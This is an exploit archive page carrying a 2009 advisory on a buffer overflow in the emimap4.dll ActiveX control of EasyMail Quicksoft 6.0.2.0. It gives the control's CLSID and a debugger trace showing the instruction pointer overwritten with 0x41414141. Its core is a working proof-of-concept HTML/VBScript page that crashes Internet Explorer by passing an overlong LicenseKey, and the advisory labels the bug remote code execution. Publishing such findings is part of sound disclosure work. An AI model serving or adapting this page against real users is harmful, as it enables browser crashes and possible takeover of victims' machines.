EasyMail Quicksoft 6.0.2.0 Denial Of Service

EasyMail Quicksoft 6.0.2.0 Denial Of Service: Posted Sep 29, 2009; Authored by Francis Provencher; EasyMail Quicksoft version 6.0.2.0 suffers from a remote denial of service vulnerability in emimap4.dll.; tags | exploit, remote, denial of service; MD5 | a4e3361e2d5ad551dbd210acdcad1916; Download | Favorite | Comments (0)

EasyMail Quicksoft 6.0.2.0 Denial Of Service

#####################################################################################

Application:  EasyMail Quicksoft 6.0.2.0
            
Platforms:    Windows XP Professional French SP2

crash:        IE 6.0.2900.2180
        
  
Exploitation: remote Code Execution

Date:         2009-08-24

Author:       Francis Provencher (Protek Research Lab's)
             

#####################################################################################

1) Introduction
2) Technical details and bug
3) The Code

#####################################################################################

===============
1) Introduction
===============

Create, send, download, parse, print and store internet email messages in your classic windows application.  Designed for Visual Basic, ASP, C++, Delphi, ColdFusion, PowerBuilder, Access and other development environments.  COM or standard DLL interfaces.  This is the software that processes hundreds of millions of email messages on the Internet every day.

#####################################################################################

============================
2) Technical details 
============================

Name:  emimap4.dll
Ver.:  6.0.2.0
CLSID:  {0CEA3FB1-7F88-4803-AA8E-AD021566955D}

ModLoad: 037f0000 0381e000   C:\WINDOWS\system32\emimap4.dll
(2088.2388): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000000 ebx=0380c878 ecx=0012df70 edx=00000039 esi=0033df18 edi=0033e14c
eip=41414141 esp=0012df88 ebp=41414141 iopl=0         nv up ei pl zr na pe nc





#####################################################################################

===========
3) The Code
===========

Proof of concept DoS code;

<HTML>
<object classid='clsid:0CEA3FB1-7F88-4803-AA8E-AD021566955D' id='target'></object>
<script language = 'vbscript'>



  Scrap  =   unescape("http://AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA")


  code = Scrap


  target.LicenseKey = code


</script>
<html>
~



#####################################################################################

Comments

Subscribe to this comment feed

No comments yet, be the first!

Top Authors In Last 30 Days

Heine Pedersen 29 files
Torben Jensen 29 files
Farbod Mahini 26 files
Ubuntu 26 files
Red Hat 25 files
Debian 24 files
Mandriva 17 files
sinn3r 11 files
the_cyber_nuxbie 10 files
Am!r 9 files

File Archives

Systems

AIX (352)
Apple (963)
BSD (302)
Cisco (1,247)
Debian (3,802)
Fedora (1,660)
FreeBSD (1,024)
Gentoo (2,468)
HPUX (685)
iPhone (95)
IRIX (217)
Juniper (60)
Linux (20,649)
Mac OS X (415)
Mandriva (2,205)
NetBSD (235)
OpenBSD (414)
RedHat (2,431)
Slackware (378)
Solaris (1,472)
SUSE (1,228)
Ubuntu (2,728)
UNIX (6,852)
UnixWare (148)
Windows (4,019)
Other

EasyMail Quicksoft 6.0.2.0 Denial Of Service

EasyMail Quicksoft 6.0.2.0 Denial Of Service

Comments

File Archive:

May 2012

Top Authors In Last 30 Days

File Tags

File Archives

Systems

EasyMail Quicksoft 6.0.2.0 Denial Of Service

Share This

EasyMail Quicksoft 6.0.2.0 Denial Of Service

Comments

File Archive:

May 2012

Top Authors In Last 30 Days

File Tags

File Archives

Systems